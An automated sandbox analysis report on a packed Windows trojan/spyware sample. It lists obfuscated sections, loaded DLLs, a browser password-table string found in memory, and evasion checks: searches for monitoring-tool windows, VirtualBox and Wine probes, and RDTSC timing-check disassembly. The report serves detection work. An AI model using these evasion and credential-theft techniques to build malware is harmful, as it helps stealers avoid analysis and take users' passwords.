            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D4AC05_2_002D4AC0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002EDB305_2_002EDB30
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002EFB605_2_002EFB60
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D2B805_2_002D2B80
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00492CC95_2_00492CC9
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F8CB05_2_002F8CB0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A54E85_2_004A54E8
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D5C905_2_002D5C90
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00497CF65_2_00497CF6
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003024E05_2_003024E0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D6CC05_2_002D6CC0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004274BA5_2_004274BA
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D94D05_2_002D94D0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A056A5_2_004A056A
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002DAD005_2_002DAD00
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003D05085_2_003D0508
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00401D015_2_00401D01
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D35805_2_002D3580
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F7E205_2_002F7E20
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0033FE705_2_0033FE70
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F06505_2_002F0650
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004946C15_2_004946C1
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F5E905_2_002F5E90
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00310F605_2_00310F60
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003087B05_2_003087B0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0030C7805_2_0030C780
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D27D05_2_002D27D0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D77D05_2_002D77D0
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992763831967213
            Source: file.exeStatic PE information: Section: xwjcifzz ZLIB complexity 0.9946616550226586
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003027B0 CoCreateInstance,5_2_003027B0
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000005.00000003.1357574626.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1331903448.000000000561C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1331557309.0000000005638000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1357188747.000000000561F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 1866752 > 1048576
            Source: file.exeStatic PE information: Raw size of xwjcifzz is bigger than: 0x100000 < 0x19dc00

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 5.2.file.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwjcifzz:EW;olfigpve:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwjcifzz:EW;olfigpve:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x1d0a27 should be: 0x1d2205
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: xwjcifzz
            Source: file.exeStatic PE information: section name: olfigpve
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00CA1EC2 push ds; retf 0000h5_3_00CA1EDE
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C990E3 push FFFFFFDBh; iretd 5_3_00C990F4
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00CA2DA8 push 2800BFDEh; retf 5_3_00CA2DAD
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C9DEA0 push eax; ret 5_3_00C9DEC1
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C99561 push esi; retf 5_3_00C99564
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C9C42A pushfd ; ret 5_3_00C9C42E
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edx; mov dword ptr [esp], esp5_2_004A208E
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push esi; mov dword ptr [esp], 7DAF6845h5_2_004A213D
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 43F77058h; mov dword ptr [esp], ecx5_2_004A2182
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edx; mov dword ptr [esp], 19F5C14Fh5_2_004A2229
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ebp; mov dword ptr [esp], 0A66FF98h5_2_004A223F
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 49A7B8F7h; mov dword ptr [esp], ebx5_2_004A234C
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edi; mov dword ptr [esp], ebx5_2_004A2409
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ebp; mov dword ptr [esp], ecx5_2_004A2432
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 6C7D3D31h; mov dword ptr [esp], ecx5_2_004A24B7
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ebp; mov dword ptr [esp], 2F113CF4h5_2_004A24BE
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push esi; mov dword ptr [esp], 011EBA7Ch5_2_004A256C
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edx; mov dword ptr [esp], ebx5_2_004A257F
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ecx; mov dword ptr [esp], esp5_2_004A25A9
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 7B4530A1h; mov dword ptr [esp], edx5_2_004A25ED
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edx; mov dword ptr [esp], ebx5_2_004A2633
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edx; mov dword ptr [esp], eax5_2_004A2642
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push eax; mov dword ptr [esp], esp5_2_004A2749
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 7D9FB3A4h; mov dword ptr [esp], eax5_2_004A2795
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ebp; mov dword ptr [esp], ebx5_2_004A27C9
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push eax; mov dword ptr [esp], ecx5_2_004A2888
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push ebx; mov dword ptr [esp], eax5_2_004A2925
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 53E85589h; mov dword ptr [esp], ebx5_2_004A2993
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push 197B9E01h; mov dword ptr [esp], edx5_2_004A29B0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edi; mov dword ptr [esp], edx5_2_004A2A4A
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E push edi; mov dword ptr [esp], ecx5_2_004A2A51
            Source: file.exeStatic PE information: section name: entropy: 7.977987189441114
            Source: file.exeStatic PE information: section name: xwjcifzz entropy: 7.954800437299881

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CCD6 second address: 32CCDC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CCDC second address: 32CCE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAFA8 second address: 4AAFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jl 00007F466483F64Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAFC0 second address: 4AAFC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494238 second address: 49423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA557 second address: 4AA56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4664873C0Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA56A second address: 4AA572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA6F6 second address: 4AA702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F4664873C06h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA702 second address: 4AA706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA706 second address: 4AA70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA881 second address: 4AA885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD721 second address: 4AD768 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F4664873C06h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 7745A672h 0x00000013 jmp 00007F4664873C0Dh 0x00000018 mov dword ptr [ebp+122D2B2Bh], eax 0x0000001e push 00000003h 0x00000020 mov esi, dword ptr [ebp+122D2C75h] 0x00000026 push 00000000h 0x00000028 push 00000003h 0x0000002a sbb ecx, 6E6E8362h 0x00000030 push A2682BDFh 0x00000035 jbe 00007F4664873C14h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD851 second address: 4AD85B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD85B second address: 4AD8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jnl 00007F4664873C0Ch 0x0000000f pop edi 0x00000010 nop 0x00000011 movsx esi, di 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F4664873C08h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jl 00007F4664873C08h 0x00000036 mov ecx, eax 0x00000038 mov edx, dword ptr [ebp+122D2D19h] 0x0000003e push 4DF670CBh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD8AC second address: 4AD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD8B0 second address: 4AD8B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD8B6 second address: 4AD927 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F466483F648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4DF6704Bh 0x00000011 jmp 00007F466483F64Eh 0x00000016 push 00000003h 0x00000018 or di, 748Bh 0x0000001d push 00000000h 0x0000001f movsx ecx, si 0x00000022 mov edx, dword ptr [ebp+122D2D59h] 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F466483F648h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 jmp 00007F466483F656h 0x00000049 push 97053CB4h 0x0000004e push edi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD927 second address: 4AD92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADA17 second address: 4ADA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADA1F second address: 4ADAA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 653121A3h 0x0000000e call 00007F4664873C16h 0x00000013 push edi 0x00000014 mov di, cx 0x00000017 pop edx 0x00000018 pop edx 0x00000019 mov esi, dword ptr [ebp+122D2EE9h] 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 ja 00007F4664873C09h 0x00000029 mov cx, di 0x0000002c push 00000003h 0x0000002e sub dword ptr [ebp+122D3B86h], esi 0x00000034 call 00007F4664873C09h 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F4664873C19h 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 jmp 00007F4664873C11h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADAA4 second address: 4ADAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADAA8 second address: 4ADAAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADAAE second address: 4ADAB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADAB4 second address: 4ADAEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jns 00007F4664873C12h 0x0000001a je 00007F4664873C0Ch 0x00000020 jp 00007F4664873C06h 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jp 00007F4664873C06h 0x00000033 jnl 00007F4664873C06h 0x00000039 popad 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADAEE second address: 4ADB24 instructions: 0x00000000 rdtsc 0x00000002 js 00007F466483F648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or dword ptr [ebp+122D2F7Ah], esi 0x00000011 lea ebx, dword ptr [ebp+124545F9h] 0x00000017 mov dword ptr [ebp+122D3B80h], eax 0x0000001d cmc 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F466483F652h 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ADB24 second address: 4ADB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE05D second address: 4CE065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE065 second address: 4CE06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1AFA second address: 4A1B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F466483F646h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1B06 second address: 4A1B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1B0A second address: 4A1B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Fh 0x00000007 jnc 00007F466483F646h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBEF8 second address: 4CBF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnc 00007F4664873C06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F4664873C06h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBF0C second address: 4CBF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F466483F646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC1E3 second address: 4CC1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC1E9 second address: 4CC1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F466483F646h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC1F7 second address: 4CC203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4664873C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC203 second address: 4CC208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC208 second address: 4CC227 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4664873C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC227 second address: 4CC22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC22D second address: 4CC231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC4D6 second address: 4CC4E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC4E0 second address: 4CC4F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CCAC2 second address: 4CCAE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnl 00007F466483F646h 0x00000013 jnp 00007F466483F646h 0x00000019 popad 0x0000001a jmp 00007F466483F64Dh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CCEC9 second address: 4CCECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CCECD second address: 4CCEE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F466483F651h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CCEE6 second address: 4CCF20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4664873C0Ch 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jg 00007F4664873C06h 0x00000019 jmp 00007F4664873C0Fh 0x0000001e popad 0x0000001f rdtsc
